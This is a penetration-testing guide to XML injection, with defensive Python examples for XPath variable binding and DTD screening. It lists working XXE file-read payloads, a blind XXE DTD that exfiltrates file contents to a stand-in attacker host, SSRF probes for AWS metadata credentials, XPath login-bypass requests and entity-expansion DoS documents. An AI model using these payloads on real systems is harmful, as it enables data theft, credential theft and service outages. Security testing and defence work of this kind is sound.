Testing for XML Injection Vulnerabilities
When to Use
- When testing applications that process XML input (SOAP APIs, XML-RPC, file uploads)
- During penetration testing of applications with XML parsers
- When assessing SAML-based authentication implementations
- When testing file import/export functionality that handles XML formats
- During API security testing of SOAP or XML-based web services
Prerequisites
- Burp Suite with XML-related extensions (Content Type Converter, XXE Scanner)
- XMLLint or similar XML validation tools
- Understanding of XML structure, DTDs, and entity processing
- Python 3.x with lxml and requests libraries
- Access to an out-of-band interaction server (Burp Collaborator, interact.sh)
- Sample XXE payloads from PayloadsAllTheThings repository
Workflow
Step 1 — Identify XML Processing Endpoints
```bash
# Look for endpoints accepting XML content types:
# Content-Type: application/xml, text/xml, application/soap+xml

# Check WSDL files for SOAP services
curl -s "http://target.com/service?wsdl"

# Test whether the endpoint accepts XML by changing the Content-Type
curl -X POST http://target.com/api/data \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?><root><test>hello</test></root>'

# Check for XML file upload functionality:
# look for .xml, .svg, .xlsx, .docx file processing
```

Step 2 — Test for Basic XXE (File Retrieval)
```xml
<!-- Basic XXE to read local files -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>

<!-- Windows file retrieval -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<root><data>&xxe;</data></root>

<!-- Using PHP wrapper for base64-encoded file content -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root><data>&xxe;</data></root>
```

Step 3 — Test for Blind XXE with Out-of-Band Detection
```xml
<!-- Out-of-band XXE using external DTD -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker-server.com/xxe.dtd">
%xxe;
]>
<root><data>test</data></root>

<!-- External DTD file (xxe.dtd hosted on attacker server) -->
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker-server.com/?data=%file;'>">
%eval;
%exfil;

<!-- DNS-based out-of-band detection -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://xxe-test.burpcollaborator.net">
]>
<root><data>&xxe;</data></root>
```

Step 4 — Test for SSRF via XXE
```xml
<!-- Internal network scanning via XXE -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root><data>&xxe;</data></root>

<!-- AWS metadata endpoint access -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&xxe;</data></root>

<!-- Internal port scanning -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-server:8080/">
]>
<root><data>&xxe;</data></root>
```

Step 5 — Test for XPath Injection
```bash
# Basic XPath injection in search parameters
curl "http://target.com/search?query=' or '1'='1"

# XPath authentication bypass
curl -X POST http://target.com/login \
  -d "username=' or '1'='1&password=' or '1'='1"

# XPath data extraction
curl "http://target.com/search?query=' or 1=1 or ''='"

# Blind XPath injection with boolean-based extraction
curl "http://target.com/search?query=' or string-length(//user[1]/password)=8 or ''='"
curl "http://target.com/search?query=' or substring(//user[1]/password,1,1)='a' or ''='"
```
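Why the authentication-bypass payload above works, and what the fix looks like, is easiest to see on a small in-memory user store. The following is an added example, not code from the page: the same credential check written with string concatenation (vulnerable) and with XPath variable binding (fixed), using lxml, which the prerequisites already list. The user store, usernames and passwords are constructed placeholders.

```python
from lxml import etree

# Constructed in-memory user store; the credential values are placeholders.
USER_STORE = etree.fromstring(
    b"<users>"
    b"<user><username>alice</username><password>alice-pass</password><role>admin</role></user>"
    b"<user><username>bob</username><password>bob-pass</password><role>user</role></user>"
    b"</users>"
)

BYPASS = "' or '1'='1"  # the Step 5 authentication-bypass payload


def login_concat(username: str, password: str) -> list:
    """Vulnerable: input is spliced into the query text, so a quote in it closes
    the string literal and the rest of the input is parsed as XPath operators."""
    query = f"//user[username/text()='{username}' and password/text()='{password}']"
    return [u.findtext("username") for u in USER_STORE.xpath(query)]


def login_bound(username: str, password: str) -> list:
    """Fixed: values travel as XPath variables ($u, $p). lxml binds them as plain
    string values, so quotes and 'or' in the input are compared, never parsed."""
    query = "//user[username/text()=$u and password/text()=$p]"
    return [u.findtext("username") for u in USER_STORE.xpath(query, u=username, p=password)]


if __name__ == "__main__":
    print("concat, valid:  ", login_concat("alice", "alice-pass"))
    print("concat, bypass: ", login_concat(BYPASS, BYPASS))  # every user matches
    print("bound,  bypass: ", login_bound(BYPASS, BYPASS))   # nothing matches
```

With both fields injected, the concatenated predicate reads `username='' or '1'='1' and password='' or '1'='1'`; XPath binds `and` tighter than `or`, so the trailing `'1'='1'` alone makes every `user` node match. Binding the values as variables also neutralises the `string-length()` and `substring()` probes from the blind case, since they arrive as literal text to compare rather than as expression syntax.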
Step 6 — Test for XML Billion Laughs (DoS)
```xml
<!-- Billion Laughs attack (use only in authorized testing) -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root><data>&lol4;</data></root>

<!-- Quadratic blowup attack -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY a "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
]>
<root>&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;</root>
```

Key Concepts
| Concept | Description |
|---|---|
| XXE (XML External Entity) | Attack exploiting XML parsers that process external entity references |
| Blind XXE | XXE where response is not reflected; requires out-of-band channels |
| XPath Injection | Injection into XPath queries used to navigate XML documents |
| DTD (Document Type Definition) | Declarations that define XML document structure and entities |
| Parameter Entities | Special entities (%) used within DTDs for blind XXE exploitation |
| SSRF via XXE | Using XXE to make server-side requests to internal resources |
| XML Bomb | Denial of service via recursive entity expansion (Billion Laughs) |
Tools & Systems
| Tool | Purpose |
|---|---|
| Burp Suite | HTTP proxy with XXE Scanner extension for automated detection |
| XXEinjector | Automated XXE injection and data exfiltration tool |
| OXML_XXE | Tool for embedding XXE payloads in Office XML documents |
| xmllint | XML validation and parsing utility for payload testing |
| interact.sh | Out-of-band interaction server for blind XXE detection |
| Content Type Converter | Burp extension to convert JSON requests to XML for XXE testing |
Common Scenarios
- File Disclosure — Read sensitive server files (/etc/passwd, web.config) through classic XXE entity injection in XML input fields
- SSRF to Cloud Metadata — Access AWS/GCP/Azure metadata endpoints through XXE to steal IAM credentials and access tokens
- Blind Data Exfiltration — Extract sensitive data through out-of-band DNS/HTTP channels when XXE output is not reflected
- SAML XXE — Inject XXE payloads into SAML assertions during single sign-on authentication flows
- SVG File Upload XXE — Upload malicious SVG files containing XXE payloads to trigger server-side XML parsing
Output Format
XML Injection Assessment Report
- Target: http://target.com/api/xml-endpoint
- Vulnerability Types Found: XXE, Blind XXE, XPath Injection
- Severity: Critical
Findings
| # | Type | Endpoint | Payload | Impact |
|---|---|---|---|---|
| 1 | XXE File Read | POST /api/import | SYSTEM "file:///etc/passwd" | Local File Disclosure |
| 2 | Blind XXE | POST /api/upload | External DTD with OOB | Data Exfiltration |
| 3 | SSRF via XXE | POST /api/parse | SYSTEM "http://169.254.169.254/" | Cloud Credential Theft |
Remediation
- Disable external entity processing in XML parser configuration
- Use JSON instead of XML where possible
- Implement XML schema validation with strict DTD restrictions
- Block outbound connections from XML processing services
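The first remediation item ("disable external entity processing") is easier to verify when the parser can report what a document asks it to do before anything is resolved. The following is an added example, not code from the page: a standard-library-only screen built on expat's DTD callbacks that records every entity declaration, estimates how far each internal entity expands (the Billion Laughs signal from Step 6), and logs every file or URL the parser would have fetched without fetching it; `parse_untrusted()` then rejects any DOCTYPE outright before handing the bytes to ElementTree. The depth and amplification limits in `classify()` are illustrative policy values, not parser defaults, and the sample documents are constructed from the payloads in Steps 2, 3, 4 and 6.

```python
import re
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat
from dataclasses import dataclass, field

ENTITY_REF = re.compile(r"&([A-Za-z_:][\w.:-]*);")


@dataclass
class DtdReport:
    document_len: int = 0
    has_doctype: bool = False
    internal: dict = field(default_factory=dict)        # name -> literal replacement text
    external: list = field(default_factory=list)        # (name, is_parameter_entity, system_id)
    fetch_attempts: list = field(default_factory=list)  # system ids expat asked us to resolve
    text_chars: int = 0                                 # character data the parse produced

    def expanded_size(self, name, _stack=()):
        """Fully expanded length of an internal entity (a reference cycle counts as infinite)."""
        if name in _stack:
            return float("inf")
        text = self.internal.get(name, "")
        size = len(text)
        for ref in ENTITY_REF.findall(text):
            if ref in self.internal:  # swap the literal "&ref;" for its expanded length
                size += self.expanded_size(ref, _stack + (name,)) - (len(ref) + 2)
        return size

    def nesting_depth(self, name, _stack=()):
        """Levels of entity-inside-entity that a reference to `name` unfolds."""
        if name in _stack:
            return 0
        refs = {r for r in ENTITY_REF.findall(self.internal.get(name, "")) if r in self.internal}
        return 1 + max(self.nesting_depth(r, _stack + (name,)) for r in refs) if refs else 0


def screen(data: bytes) -> DtdReport:
    """Parse with expat purely to observe DTD activity; nothing external is fetched."""
    report = DtdReport(document_len=len(data))
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report.has_doctype = True

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is None:
            report.internal[name] = value or ""
        else:
            report.external.append((name, bool(is_param), system_id))

    def on_external_ref(context, base, system_id, public_id):
        report.fetch_attempts.append(system_id)
        return 1  # tell expat the entity is empty; never read the file or URL

    def on_text(text):
        report.text_chars += len(text)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.CharacterDataHandler = on_text
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        pass  # malformed input still yields the declarations seen before the error
    return report


def classify(report, max_depth=3, max_amplification=10.0):
    """Map a report onto the Key Concepts classes; the limits are illustrative policy."""
    findings = set()
    if any(not p for _, p, _ in report.external) or report.fetch_attempts:
        findings.add("XXE")        # classic file read / SSRF-via-XXE surface
    if any(p for _, p, _ in report.external):
        findings.add("Blind XXE")  # external parameter entity: out-of-band surface
    amp = report.text_chars / max(report.document_len, 1)  # output chars per input byte
    if report.internal and (max(report.nesting_depth(n) for n in report.internal) >= max_depth
                            or amp > max_amplification):
        findings.add("XML Bomb")
    return findings


def parse_untrusted(data: bytes) -> ET.Element:
    """Mitigation: refuse any DOCTYPE in untrusted input, then parse normally."""
    report = screen(data)
    if report.has_doctype:
        raise ValueError(f"DOCTYPE rejected; findings={sorted(classify(report))}")
    return ET.fromstring(data)


SAMPLES = {  # constructed from the payloads in Steps 2, 3, 4 and 6 above
    "classic": b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
               b'<root><data>&xxe;</data></root>',
    "blind": b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM '
             b'"http://attacker-server.com/xxe.dtd">%xxe;]><root><data>test</data></root>',
    "ssrf": b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM '
            b'"http://169.254.169.254/latest/meta-data/">]><root><data>&xxe;</data></root>',
    "bomb": b'<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "'
            + b"&lol;" * 10 + b'"><!ENTITY lol3 "' + b"&lol2;" * 10 + b'"><!ENTITY lol4 "'
            + b"&lol3;" * 10 + b'">]><root><data>&lol4;</data></root>',
    "quadratic": b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY a "' + b"A" * 40 + b'">]>'
                 b'<root>' + b"&a;" * 15 + b'</root>',
    "clean": b'<root><test>hello</test></root>',
}

if __name__ == "__main__":
    for label, doc in SAMPLES.items():
        r = screen(doc)
        print(f"{label:10} findings={sorted(classify(r))} fetch={r.fetch_attempts} chars={r.text_chars}")
```

Two things are worth noting from the output. The blind payload produces no fetch attempt at all: expat leaves parameter entities unparsed by default, so the only evidence is the external declaration itself, which is why the screen records declarations rather than waiting for network activity. And the four-level Billion Laughs payload on this page expands to only 3000 characters, far below any byte limit, so it is the nesting depth, not the size, that flags it; a production limit on expansion size alone would miss this scaled-down form.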